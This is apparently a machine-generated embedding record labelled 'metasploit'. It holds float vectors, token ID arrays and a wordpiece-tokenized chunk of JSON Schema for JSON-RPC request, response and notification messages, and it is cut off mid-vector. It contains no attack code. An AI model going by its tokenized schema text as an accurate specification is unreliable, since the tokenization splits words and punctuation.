0.7739538550376892, 0.5231615304946899, -0.20311269164085388, -0.45995959639549255, 0.3083190321922302, -0.30084091424942017, 0.5094413757324219, -0.5273492336273193, -0.3752995431423187, -0.09152226150035858, -0.5862888693809509, 0.320539653301239, -0.2804844379425049, 0.28611648082733154, -0.050761669874191284, 0.013471540994942188, -0.25172796845436096, -0.7239697575569153, -0.21291153132915497, -0.019820017740130424, -0.5490184426307678, -0.10856014490127563, 0.33750054240226746, -0.0063220057636499405, -0.7652807831764221, 0.4403274953365326, 0.39107757806777954, -0.48399096727371216, 0.1259133368730545, 0.49723103642463684, 0.18502992391586304, -1.0745646953582764, 0.1548503339290619, 0.29912614822387695, -0.05785403773188591, -0.11115952581167221, 0.08530690521001816, -0.3619299530982971, -0.7367023229598999, -0.27530550956726074, 0.31263336539268494, -0.39623016119003296, 0.1672198325395584, 0.16593192517757416, -1.2128241062164307, 0.2843947112560272, 0.12624922394752502, -0.16859816014766693, -0.5993400812149048, -0.46881335973739624, 0.5263285040855408, -0.189319908618927, 0.3586651384830475, 0.4873308539390564, -0.20189006626605988, -0.1935233175754547, 0.013405878096818924, 0.5373026728630066, -0.502936601638794, 0.018856972455978394, 0.9053746461868286, 0.14616160094738007, 0.07388700544834137, 0.8349804878234863, -0.364141583442688, -0.6399115920066833, -0.23243144154548645, -0.6149497628211975, -0.22263869643211365, 0.25244393944740295, 0.2940674424171448, 0.6004635691642761, 0.7674673795700073, -0.7158821821212769, -0.2804122269153595, 0.2953647971153259, 0.5450409650802612, -0.025368498638272285, 0.8233289122581482, 0.6108440160751343, -0.027702633291482925, -0.01858304999768734, -0.34934961795806885, 0.8071491718292236, -0.13048532605171204, 0.640961766242981, -0.15210150182247162, 0.574463427066803, -0.11168596893548965, -0.009563770145177841, 0.40507185459136963, -0.09433729946613312, -0.7102692127227783, 0.5975301861763, -0.21164798736572266, 0.8263355493545532, -0.8288882374763489, -0.059328593313694, 0.5795570015907288, 0.22810646891593933, 0.4744727313518524, 0.02749861776828766, 0.2739378809928894, 0.2652253210544586, -0.07755429297685623, -0.2838837504386902, -1.0986013412475586, 0.21755388379096985, 0.06368936598300934, 0.3648490607738495, -0.543524980545044, -0.3923985958099365, -0.9456881880760193, 0.7841761112213135, 0.42677128314971924, 0.7154747247695923, 0.5154915452003479, 0.27840644121170044, 0.19722947478294373, -0.03336532413959503, 0.44702404737472534, -0.2821792662143707, 0.4839675724506378, -0.3179178535938263, 0.7901482582092285, -0.29654747247695923, -0.48392167687416077, -1.4672174453735352, -0.1506187617778778, -0.8833556175231934, -0.10331001877784729, 0.6081824898719788, -0.006473178509622812, -0.5813499689102173, 0.16510583460330963, -0.1997343748807907, -0.5740901231765747, -0.39526522159576416, -0.41582363843917847, -0.6498421430587769, 0.49948906898498535, 0.6884204745292664, -0.6888113021850586, -0.47031906247138977, -1.28823983669281, 0.16437841951847076, 0.731246829032898, -0.4777444899082184, -0.16579507291316986, -0.6341882348060608, -0.02208825573325157, -0.8713985085487366, 0.17754805088043213, 0.4782745838165283, 0.02885451167821884, 0.5993009805679321, -0.6033239364624023, -0.2656862437725067, 0.6056484580039978, -0.5444870591163635, -0.8659682273864746, -0.3560510277748108, -0.030438140034675598, 0.6603377461433411, 0.4736589789390564, -0.8110134601593018, -0.23959480226039886, 0.9510385394096375, -1.1055885553359985, 0.2553984820842743, -0.9434857964515686, 0.02320374734699726, -0.3136201500892639, -0.2509741485118866, 0.4630485475063324, 0.029192587360739708, -0.8482037782669067, -0.6013785600662231, 0.26975688338279724, 0.675810694694519, -0.6696190237998962, -0.5612726807594299, 1.2591661214828491, -0.809073805809021, -0.20765696465969086, 0.7551137804985046, 0.28000473976135254, -0.37641772627830505, 0.4137896001338959, -0.22596755623817444, -0.392939954996109, 0.6302404999732971, -0.6956378221511841, 0.571282148361206, 0.25518515706062317, 0.1789039522409439, 0.41008836030960083, -0.6340996623039246, 0.8642250299453735, 0.08743836730718613, -0.5123528242111206, -0.8511205911636353, -0.7924919724464417, -0.3610851764678955, 0.5721122026443481, -0.5877604484558105, 0.1904798001050949, -0.3295636773109436, -0.2705291211605072, 0.5809100866317749, 0.08332301676273346, -0.3966579735279083, -0.4556978940963745, -0.28992030024528503, -0.3729238510131836, 0.2804487347602844, 0.06115478649735451, 0.6473701000213623, -0.3089706301689148, -0.5269102454185486, 0.8181262016296387, -0.05547370761632919, -0.14017969369888306, -0.6531748175621033, -0.15770141780376434, -0.8055289387702942, 0.25120460987091064, -0.20044423639774323, 0.5445131659507751, -0.7060338258743286, 0.03190154582262039, 0.12693294882774353, 0.9320698976516724, 0.1871233433485031, -0.295854777097702, -0.9702252745628357, 0.8489552140235901, 0.29161298274993896, -1.1767246723175049, -0.5397337675094604, 0.24020804464817047, -0.3726835250854492, 0.07333849370479584, 0.37574413418769836, -0.5982388854026794, -1.058843970298767, -0.7253362536430359, 0.20295321941375732, -0.3925682604312897, -0.1718241572380066, -1.0885409116744995, -0.926537811756134, -0.04215428978204727, -0.29682621359825134, 0.40458497405052185, -1.0534327030181885, -0.6933485865592957, -0.42377519607543945, 0.05062060058116913, -0.44024980068206787, 0.34928223490715027, -0.6672767400741577, -0.06143064424395561, -0.1132582575082779, 0.7370665073394775, 0.12375029176473618, 0.12408533692359924, 0.22073231637477875, 0.05264676734805107, 0.3015543520450592, 0.3646385073661804, 0.17223826050758362, -0.8478742241859436, -0.43943849205970764, 0.356969952583313, -0.8304828405380249, 0.16105307638645172, -0.7336816787719727, -0.17854014039039612, -0.40577057003974915, -0.21323353052139282, -0.5417430996894836, -0.04077750816941261, 0.29862669110298157, -0.23244130611419678, 0.1961594969034195, -0.07577771693468094, 0.1906476765871048, 0.18633529543876648, 1.3788199424743652, 0.4335750639438629, -0.25899481773376465, -0.4561656713485718, -0.2948713004589081, -0.3682486414909363, -1.2527042627334595, 0.32293665409088135, 0.15546490252017975, 0.004886140581220388, 0.031994596123695374, 0.11087431013584137, 0.5117764472961426, -1.0042331218719482, 0.010430486872792244, 1.3444631099700928, 0.6421299576759338, -0.6903648972511292, -0.939302921295166, -0.24425335228443146, 0.645135223865509, -0.38723236322402954, 0.11576184630393982, -0.44291773438453674, -0.08133184164762497, 0.1556994765996933, -0.22122319042682648, -0.5933435559272766, -1.4617717266082764, -0.00018387017189525068, 0.7730602025985718, 0.24179895222187042, 0.85692298412323, -0.3058164715766907, -0.9152236580848694, -0.38641616702079773, 0.20127159357070923, -0.21181908249855042, -0.6833304166793823, 0.783215343952179, 0.8509020209312439, -0.227842777967453, 0.3377644121646881, 0.09308203309774399, -0.012876869179308414, 0.20122183859348297, 0.9717769622802734, -0.5307062864303589, -1.5289652347564697, 0.3561522662639618, 0.4572710692882538, -1.4608662128448486, -0.6576071381568909, -0.9356752634048462, -0.3826490640640259, 0.29852452874183655, 0.07398194074630737, -0.15840083360671997, 0.3531028926372528, 0.18716895580291748, -0.3799892067909241, 0.4426131844520569, 0.16388823091983795, 0.06074770539999008, -0.1882130205631256, 0.1991432160139084, -0.5062401294708252, 0.22335274517536163, 0.9354076385498047, 0.08780789375305176, 0.030426405370235443, -0.22340601682662964, -0.015533444471657276, -0.14790686964988708, -0.048483360558748245, 1.0111000537872314, -0.07293546199798584, 0.9854692220687866, 0.16843484342098236, -0.10464976727962494, 0.6784665584564209, -0.3017856180667877, 0.30720967054367065, 1.1115397214889526, -0.09298423677682877, -1.231207251548767, -0.3361088037490845, 0.26037004590034485, 0.026059338822960854, -0.36072254180908203, -0.031531888991594315, 0.049045246094465256, -0.002393868984654546, -0.03705842047929764, -0.12826937437057495, -0.8680506944656372, -1.2562862634658813, -1.0522316694259644, -0.7907236814498901, 0.03595149517059326, -0.8971784710884094, -0.06425496935844421, 0.22491425275802612, 0.06197312846779823, -0.32279670238494873, -0.014269506558775902, 0.05673697963356972, -0.016254782676696777, -0.12118518352508545, -0.2237362116575241, 0.05424165353178978, -1.0936912298202515, -0.927421510219574, -0.39183908700942993, 0.5721204280853271, -0.6603081226348877, -0.17617176473140717, -0.7362462878227234, 0.10411389917135239, -0.6389984488487244, 1.0883005857467651, -0.18237288296222687, 0.009298593737185001, -0.2519809603691101, -0.24843980371952057, 0.20313706994056702, 0.7991864085197449, -0.4163602888584137, 0.598453938961029, 0.44634464383125305, -0.4507565200328827, -0.1645728200674057, -0.6830872297286987, -0.20191295444965363, -0.2522009611129761, 0.5452998876571655, 0.3247530460357666, -0.08933999389410019, -0.878818690776825, -0.01462847925722599, 0.05850404500961304, -0.12964372336864471, -0.4483531415462494, -0.20200343430042267, 0.10326830297708511, -0.21127352118492126, -0.25303494930267334, 0.11374417692422867, 0.9398565888404846, 1.0735422372817993, 0.7689731121063232, -0.49103695154190063, -0.049761317670345306, 0.6290786266326904, -0.08892464637756348, 0.2649381756782532, 0.4979996979236603, 0.2986828088760376, 0.19779755175113678, 0.48485153913497925, 0.6757202744483948, -0.19400694966316223, 0.5569471120834351, 0.111425019800663, 0.06947249174118042, -0.11013863235712051, 0.20204196870326996, 0.13719229400157928, 0.642042875289917, 1.0963484048843384, 0.1481834352016449, 0.5638872981071472, -0.3335845172405243, -0.0330083854496479, 0.47980812191963196, -1.1114965677261353, -0.5470626354217529, 0.3237501084804535, -0.9483968615531921, 0.09487352520227432, 0.17568174004554749, -1.0207074880599976, -0.40385234355926514, 0.5658361911773682, -0.2969382107257843, 0.4980359971523285, 0.7313053607940674, 0.02321617677807808, 1.0435559749603271, -0.6039740443229675, -0.9051400423049927, 0.021608132869005203, 0.05690537393093109, -1.466390609741211, -1.464239239692688, 0.14470332860946655, 0.669071614742279, 0.793270468711853, -0.15613195300102234, -1.071498990058899, 0.398608922958374, 0.130120187997818, 0.34437644481658936, -0.8908911943435669, 0.11945214122533798, -0.7262137532234192, 0.8454086184501648, -0.3989568054676056, 0.0793684720993042, -0.10713081806898117, -0.028557443991303444, 0.7703754305839539, -0.2557739019393921, -0.9926654696464539, 0.48152998089790344, 0.01933065988123417, 0.20720645785331726, 0.10998989641666412, 0.3592981994152069, 0.42396724224090576, 0.09611434489488602, -0.007103186100721359, 0.4483245611190796, 0.3687921464443207, 0.6371204853057861, 1.505129337310791, 0.5482463240623474, 0.21722888946533203, 0.35923629999160767, -0.6328117847442627, -0.4985307455062866, 0.7482314705848694, 0.5096514821052551, -0.08699387311935425, 0.7119907140731812, -0.1609886884689331, -0.14318178594112396, 0.47100573778152466, -0.6732915639877319, 0.07479812204837799, -0.046874307096004486, 0.194636270403862, 0.37973466515541077, 0.32626089453697205, 0.9800620675086975, -0.6008610129356384, 0.5957968235015869, -0.7501274347305298, 0.05997808277606964, -0.05571519583463669, -0.21310530602931976, -1.137020230293274, -0.028037985786795616, 1.2327072620391846, 0.6257521510124207, -0.862443745136261, 0.8334277272224426, -0.48246026039123535, 0.4423689544200897, -0.048616863787174225, 0.36176446080207825, -0.3554447591304779, 0.18045713007450104, -0.6647817492485046, -0.6914838552474976, -1.0887451171875, 0.6182600259780884, 0.3850327134132385, -0.158829927444458, 0.3389005661010742, -0.4037525951862335, -0.4471743702888489, -0.42510268092155457, 0.2547360360622406, -0.3639239966869354, -0.5961697101593018, 1.0863500833511353, -0.06564830243587494, -0.15434378385543823, 0.37085768580436707, 0.5911872386932373, 0.9786091446876526, 0.2983343303203583, 1.3582574129104614, 0.009305765852332115, 0.6440755724906921, 0.27855199575424194, 0.0557233989238739, -0.3621751666069031, 0.0909322127699852, 0.07115716487169266, -0.6255637407302856, 0.42627671360969543, 0.11732760071754456, 0.3445238769054413, 0.18037620186805725, -0.23901793360710144, -0.6385186314582825, 0.4226311445236206, -0.17184552550315857, -0.3863365054130554, 0.24929796159267426, 0.683604896068573, -0.9946334958076477, 0.44309577345848083, 0.5482521057128906, 0.8871477246284485, 0.5422570705413818, -0.5478419065475464, -0.7919331789016724, -0.37010928988456726, 0.630441427230835, -0.37017568945884705, 1.641006350517273, -0.5704748630523682, -0.14756102859973907, 0.01646655797958374, -1.1642589569091797, -0.7842745780944824, 0.5075569748878479, 0.016096625477075577, -0.31292957067489624, 0.10507585853338242, 1.1326992511749268, 0.5675920844078064, 0.6122745275497437, -0.19544868171215057, -0.8548104763031006, 0.6779996156692505, 0.4787712097167969, -0.053454089909791946, 0.5754731297492981, 0.2025202363729477, 0.13469167053699493, 0.1756458282470703, -0.33358970284461975, 0.18876595795154572, -0.6006321310997009, -0.303468257188797, 0.039253611117601395, 0.5730416178703308, -0.5240877866744995, -0.0877523124217987, -0.1038089469075203, 0.5580828189849854, -0.04014776274561882, 0.33391866087913513, -1.028891682624817, 0.14188510179519653, -0.7391151189804077, 0.006010490469634533, -0.1908009648323059, -0.08524864912033081, 0.39931049942970276, 0.20676220953464508, 0.4821392297744751, -1.3659685850143433, 3.751481294631958, 0.9699356555938721, -0.26217395067214966, 0.6247872114181519, 0.5262855887413025, 0.8096778392791748, 0.6574602723121643, -0.6031802296638489, 0.7403365969657898, -0.18994469940662384, 0.2303556650876999, -0.006072622258216143, 0.572463870048523, 0.2735285758972168, -0.30321645736694336, 0.5228246450424194, -0.9330599308013916, -0.7590250372886658, 0.055440034717321396, -1.0125529766082764, -1.1760274171829224, -0.5748129487037659, -0.312179297208786, 0.8102112412452698, 0.04595757648348808, 0.17017892003059387, 0.3795734941959381, -0.8350000381469727, 0.08841002732515335, 0.09894870966672897, 0.3836824893951416, -0.4823905825614929, 0.5036131739616394, -0.19118694961071014, -0.6004984378814697, -0.28411251306533813, 0.11018361151218414, -0.9290546178817749, -0.6173835396766663, 0.24675516784191132, 0.12256113439798355, 0.1409892588853836, -0.009041663259267807, -1.1972323656082153, 0.38295066356658936, 1.0243662595748901, -0.2821931838989258, 0.98793625831604, 0.6886770129203796, -1.3428508043289185, 1.0331534147262573, -0.1410846710205078, 0.8309696912765503, 0.6251641511917114, -0.5798451900482178, 0.7207003831863403, 0.6838808655738831, -0.4514085352420807, 0.509672224521637, 0.3414881229400635, 0.8269394040107727, -0.09785051643848419, 0.8785589933395386, 0.4538727402687073, -0.7561364769935608, 0.5967692732810974, -0.10893046855926514, 0.598456621170044, 0.08601225167512894, -0.2987357974052429, -0.3293974995613098, -0.1916733831167221, -0.4504062533378601, -0.046315766870975494, 0.9006206393241882, -0.48586878180503845, -0.06374985724687576, 0.022708941251039505, 0.21692244708538055, -0.5304030179977417, 0.23341746628284454, -0.4744808077812195, -0.8243703246116638, -0.03172179311513901, 0.6709378361701965, 0.6726664304733276, -0.19764314591884613, -0.7818846106529236, -0.4276539981365204, 0.22984905540943146, 0.5575879812240601, 0.36809036135673523, -0.5523816347122192, 0.39625635743141174, -0.13204430043697357 ]
[ 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 2828, 1000, 1010, 1000, 25416, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 25416, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1010, 1000, 2828, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 6556, 1035, 18077, 1012, 4642, 2094, 1035, 2754, 2099, 1012, 1059, 18150, 1000, 1033, 1065, 1010, 1000, 21598, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 22017, 20898, 1000, 1065, 1010, 1000, 7889, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 9140, 1000, 1010, 1000, 5167, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 4132, 1000, 1010, 1000, 7905, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 4132, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 7905, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1010, 1000, 7047, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3176, 21572, 4842, 7368, 1000, 1024, 6270, 1010, 1000, 5418, 21572, 4842, 7368, 1000, 1024, 1063, 1000, 1034, 1031, 1034, 1027, 1033, 1008, 1002, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 2828, 1000, 1010, 1000, 6412, 1000, 1010, 1000, 3223, 1000, 1010, 1000, 12398, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 3223, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 22017, 20898, 1000, 1065, 1010, 1000, 12398, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1031, 1000, 19701, 1000, 1010, 1000, 5164, 1000, 1010, 1000, 2193, 1000, 1010, 1000, 22017, 20898, 1000, 1010, 1000, 4874, 1000, 1010, 1000, 9140, 1000, 1033, 1065, 1010, 1000, 6412, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 2828, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1065, 1010, 1000, 9859, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 9140, 1000, 1010, 1000, 5167, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1065, 1065, 2448, 2890, 15500, 1063, 1000, 1002, 8040, 28433, 1000, 1024, 1000, 8299, 1024, 1013, 1013, 1046, 3385, 1011, 8040, 28433, 1012, 8917, 1013, 8040, 28433, 1001, 1000, 1010, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 11498, 5244, 1000, 1010, 1000, 4118, 1000, 1010, 1000, 1046, 3385, 14536, 2278, 1000, 1010, 1000, 8909, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 1016, 1012, 1014, 1000, 1033, 1065, 1010, 1000, 8909, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 4118, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 2448, 1000, 1033, 1065, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1000, 3176, 21572, 4842, 7368, 1000, 1024, 6270, 1010, 1000, 5418, 21572 ]
metasploit
119.txt
2
##perties " : { " ^ [ ^ = ] * $ " : { " type " : " object ", " required " : [ " type ", " description ", " required ", " default " ], " properties " : { " required " : { " type " : " boolean " }, " default " : { " type " : [ " null ", " string ", " number ", " boolean ", " object ", " array " ] }, " description " : { " type " : " string " }, " type " : { " type " : " string " } } } } } } } response { " $ schema " : " http : / / json - schema. org / schema # ", " type " : " object ", " required " : [ " jsonrpc ", " id " ], " properties " : { " jsonrpc " : { " enum " : [ " 2. 0 " ] }, " id " : { " type " : " string " }, " result " : { " type " : " object ", " required " : [ " message " ] " properties " : { " message " : { " type " : " string " }, " return " : { " type " : " string " } } }, " error " : { " type " : " object ", " required " : [ " message ", " code " ], " properties " : { " message " : { " type " : " string " }, " code " : { " type " : " number " }, " data " : { " type " : " object " } } } } } messagenotification - no response { " $ schema " : " http : / / json - schema. org / schema # ", " type " : " object ", " required " : [ " params ", " method ", " jsonrpc " ], " properties " : { " jsonrpc " : { " enum " : [ " 2. 0 " ] }, " method " : { " enum " : [ " message " ] }, " params " : { " type " : " object ", " required " : [ " level ", " message " ], " properties " : { " level " : { " enum " : [ "
[ 0.652798593044281, -0.7316571474075317, 0.030709311366081238, 0.39355409145355225, -0.12276153266429901, -0.30663052201271057, 0.3386310040950775, 0.05807599052786827, 0.30580905079841614, 0.35446447134017944, 0.7096311450004578, -0.634712278842926, 0.22912023961544037, 0.001160664833150804, -0.5747058987617493, -0.5526716709136963, -0.3343287706375122, -0.1593932807445526, -1.0505917072296143, 0.206236332654953, 0.02710249274969101, 0.5733479857444763, -1.4054505825042725, -0.54408198595047, -0.8750115633010864, 0.7788345813751221, 0.7093019485473633, 0.15524853765964508, 1.023746132850647, 0.7778118252754211, 0.5032249093055725, -0.12349236756563187, -0.3925436735153198, 0.04240143299102783, 0.10364802181720734, -0.949765682220459, 0.7593581080436707, -0.35532695055007935, 0.04865865036845207, -0.3155742883682251, 0.3317441940307617, -0.9352096319198608, 0.5915524363517761, -0.6339191794395447, -0.6281441450119019, -0.2935994565486908, 0.4151380956172943, -0.2766437232494354, 0.008476926013827324, -0.8403810858726501, 0.13422702252864838, 0.11914315819740295, 0.023933924734592438, 0.16203619539737701, 0.0832664743065834, -0.31710582971572876, -0.45825615525245667, -0.4393043518066406, -0.44578203558921814, 0.17657451331615448, -0.46860840916633606, 0.4333050549030304, 0.6876293420791626, -0.993760347366333, -0.2794925570487976, 0.27177608013153076, 0.3246353268623352, -0.5710980892181396, -0.25319793820381165, -0.40423494577407837, -0.3718034327030182, 0.8347897529602051, -0.8028824925422668, -0.26949092745780945, -0.2651083469390869, -0.41015785932540894, 0.38377276062965393, 0.17302751541137695, 0.5738717913627625, 0.8725321292877197, 0.05956194922327995, 0.7197244167327881, 0.5598019957542419, -0.15346910059452057, -0.20204803347587585, -0.5457659959793091, 0.3599391281604767, 0.31076329946517944, -0.32293498516082764, 0.1140228658914566, 0.226779043674469, 0.49949559569358826, -0.7290819883346558, -0.7191268801689148, 0.5850844383239746, 0.6999109387397766, -0.01953076384961605, 0.7351931929588318, -0.02916847914457321, -0.32051941752433777, 0.717958927154541, 0.507722020149231, 0.3944850564002991, 0.5469810962677002, -0.20408643782138824, 0.49712255597114563, 0.23006132245063782, -0.36530154943466187, -0.1328401267528534, -0.6838324666023254, 0.4327967166900635, 0.05499972775578499, 0.4116162359714508, -1.1241041421890259, -0.6357251405715942, 0.22704191505908966, 0.08316946774721146, 0.4437512159347534, -0.7700933218002319, 1.0144000053405762, -0.3868643641471863, -0.5165852308273315, 0.42261579632759094, -0.268172949552536, 0.4721980094909668, -0.010429301299154758, 0.05600261688232422, 1.281877875328064, -0.3638511598110199, -0.07434489578008652, -0.10014493018388748, -0.3295411765575409, -0.1712861955165863, 0.3035281002521515, -0.4756253659725189, -0.49139919877052307, 0.0417020283639431, 0.3255312740802765, 0.4006287455558777, -0.7673220038414001, -0.3298398554325104, 0.14199179410934448, 0.5263975262641907, 0.8825367093086243, 0.32776275277137756, -0.30194491147994995, -0.2394348829984665, -0.4281232953071594, -0.912347137928009, 0.20561370253562927, 0.17593155801296234, -0.5457968711853027, 0.33325228095054626, -0.2852531969547272, -0.6428205370903015, 0.10907850414514542, 0.023069798946380615, -0.0383230559527874, -0.3698239028453827, 0.07430203258991241, 0.53840172290802, 0.630791962146759, 0.282458633184433, 0.6652488112449646, -1.0018428564071655, 0.4315476715564728, -0.13807186484336853, -0.39269208908081055, 0.03609823063015938, 0.141361802816391, 0.11322972178459167, 0.3813645541667938, 0.08871171623468399, 0.3341923952102661, 1.1914713382720947, 0.7665077447891235, 0.1300632804632187, 0.14070872962474823, 0.6111567616462708, 0.3053569495677948, -0.40966203808784485, 0.4471080005168915, 0.797540545463562, -0.03536660969257355, -0.42996373772621155, 0.15931540727615356, -0.3289411962032318, -0.2381628453731537, -0.26947927474975586, -0.15183670818805695, -0.3713969588279724, -0.008921531029045582, -0.6127903461456299, 0.5458034873008728, 0.8521072268486023, -0.000419848773162812, -0.1993352472782135, -0.11046870797872543, -0.3636023998260498, -1.446739912033081, -0.8088093996047974, 0.025683941319584846, -0.15034471452236176, 0.8059985041618347, -0.5990045070648193, 0.05800309032201767, 0.5123871564865112, 1.2551254034042358, -0.40425291657447815, 0.6729356646537781, 0.30538007616996765, 0.20098133385181427, -0.29561349749565125, 0.40473732352256775, 0.019815243780612946, -0.39275500178337097, -0.8682036995887756, 0.8595513701438904, -0.5565884709358215, 0.18448834121227264, 0.3726992905139923, 0.5784404277801514, 0.8619734048843384, 0.004412129987031221, -0.4111403822898865, 0.17933236062526703, 0.321224182844162, 0.07683253288269043, -0.2925959527492523, -0.3587438762187958, -0.24865317344665527, 0.9570767879486084, 0.11795155704021454, 1.016921877861023, -0.09889168292284012, -0.42006152868270874, 0.9161074161529541, 0.2187349796295166, 0.3778722584247589, 0.19296787679195404, -0.6085822582244873, 1.0950807332992554, 0.8335267305374146, 0.12517496943473816, 0.5178356766700745, 0.18647024035453796, 0.29826387763023376, -0.4099636673927307, -0.08254866302013397, 0.2677532136440277, 0.015923332422971725, 0.5678614974021912, 1.0362913608551025, 0.1370345503091812, -0.5739259123802185, -1.2371861934661865, 0.24286822974681854, 1.4251561164855957, -0.9330917596817017, -0.9858575463294983, 0.12834814190864563, 0.3775891363620758, -0.5189672112464905, -0.38745859265327454, -0.1658916175365448, 0.026363050565123558, -0.6133081912994385, -0.11163350939750671, 0.12344589829444885, -0.7472108006477356, -0.5331044793128967, -0.736750602722168, -1.206486701965332, -0.31069260835647583, -0.7615209817886353, -0.3974025845527649, -0.3108365535736084, -0.4738095998764038, 1.163097858428955, -0.04181830585002899, -0.5483089089393616, 0.1341349184513092, 0.43040600419044495, 0.5433215498924255, 0.07963287085294724, 0.17451322078704834, -0.9170452952384949, 0.7572563886642456, 0.2397954761981964, 0.7617178559303284, 0.18028110265731812, -1.0774966478347778, -0.6376040577888489, 0.08185291290283203, 0.6172160506248474, 0.36873963475227356, 0.28566473722457886, 0.3420204818248749, -0.1707994043827057, -0.031630758196115494, -0.48165565729141235, -0.03739210218191147, 0.26767584681510925, -0.7719842195510864, 0.04282618314027786, 0.5779585838317871, -0.6597447991371155, -0.49497538805007935, 0.7149399518966675, 0.2890353500843048, -0.4136372208595276, 0.26933935284614563, -0.04359106346964836, 0.9668780565261841, -0.1045173853635788, -0.00925526488572359, 0.1160598024725914, 0.2035473883152008, 0.0454208180308342, -0.18221792578697205, -0.2820985019207001, -0.48699668049812317, -0.04945981502532959, -0.05801895260810852, -0.07492736726999283, 0.09429769963026047, 0.08906936645507812, -0.9800462126731873, 0.22300948202610016, -0.41372716426849365, -0.9469934105873108, -1.0654910802841187, -0.5133971571922302, 0.37403273582458496, -0.21091978251934052, 0.09222652018070221, 0.31062376499176025, -0.5645445585250854, -0.3774816691875458, 0.1555069088935852, 0.33306068181991577, -0.7720780968666077, 0.4703558683395386, 0.8136071562767029, -0.7366479635238647, 0.3993168771266937, 0.46359726786613464, -0.6194682121276855, -0.028289444744586945, 0.5678127408027649, -0.5411959886550903, 0.07746269553899765, 0.12568287551403046, 0.4188856780529022, 0.13852494955062866, 1.0205492973327637, -0.25144344568252563, -0.6011348366737366, 0.31631341576576233, -0.44927000999450684, 0.35153427720069885, 0.2590354382991791, 0.19077713787555695, 0.3168140947818756, -0.4426506757736206, -0.41196244955062866, 0.027741840109229088, -0.26566287875175476, 0.3496982753276825, -0.13251326978206635, 1.2087771892547607, 0.249507337808609, -0.07374543696641922, 0.525748074054718, -0.06939537078142166, -0.16033880412578583, 0.9877796769142151, 0.15738007426261902, 0.6883845329284668, -0.43338727951049805, -0.12150515615940094, 0.7177702188491821, -0.04115574061870575, 0.3437318205833435, -0.18831157684326172, 0.44816136360168457, -0.5641229748725891, -0.4881538450717926, -0.3565821945667267, -1.1411925554275513, -0.21662531793117523, 0.4402018189430237, 0.12068962305784225, -0.11445172131061554, -0.13297121226787567, -0.5305765271186829, -0.08670753985643387, 0.6931555867195129, 0.8252307772636414, 0.7814626097679138, 0.8092358112335205, 0.14238066971302032, -0.17284832894802094, 0.08495169878005981, -0.4259897768497467, -0.05487895384430885, -0.30754321813583374, 0.3272797465324402, -0.45004454255104065, 0.40710848569869995, 0.1484426110982895, 0.010235096327960491, -0.13217197358608246, 0.28850263357162476, -0.17508873343467712, -0.11250057816505432, -0.5452511310577393, -0.3070341944694519, 0.2923983335494995, -0.23458009958267212, -0.8860369324684143, -0.2790190577507019, -0.14240320026874542, 0.6325332522392273, 0.3025907576084137, -0.8884153366088867, -0.23566801846027374, -1.0219218730926514, 0.2891243100166321, 0.02540329284965992, 0.01417887955904007, -0.19971424341201782, -0.18085022270679474, -0.3797503709793091, -0.5391134023666382, -0.009340360760688782, 0.5044015645980835, 0.24711492657661438, 0.27880343794822693, -0.44906964898109436, -0.11900532990694046, 0.9256250858306885, -0.32616958022117615, -0.5584940910339355, -0.05007708817720413, 0.05443643778562546, 0.33625051379203796, 0.3601393401622772, -0.2695830464363098, -0.41670799255371094, 0.777231752872467, -0.41613608598709106, -0.04891559109091759, -0.9570004940032959, -0.38552340865135193, 0.1753247082233429, 0.4082487225532532, -0.333991140127182, 0.009975794702768326, -0.5815171599388123, 0.07251327484846115, -0.12267553061246872, 0.5826553106307983, -0.048813577741384506, 0.07054198533296585, 1.0009275674819946, 0.18913443386554718, 0.35399383306503296, 0.28286606073379517, 0.3869718611240387, 0.025715069845318794, 0.2917671799659729, -0.5984054803848267, -0.37648406624794006, 0.4340386390686035, -0.4008803069591522, 0.623751699924469, 0.03043205291032791, -0.004337694030255079, 0.20361389219760895, -0.6414851546287537, 0.49584680795669556, 0.02832884155213833, -0.24944104254245758, -0.695428729057312, -0.5580410361289978, -0.6431422233581543, 0.2701086401939392, -0.3883459270000458, 0.513654887676239, -0.0568050853908062, -0.17642594873905182, -0.09726427495479584, -0.24938057363033295, -0.48360008001327515, -0.877995491027832, -0.6685522794723511, 0.07364381849765778, -0.27606987953186035, -0.10444596409797668, 1.0174229145050049, -0.033475082367658615, -0.4881788194179535, 0.5361713767051697, 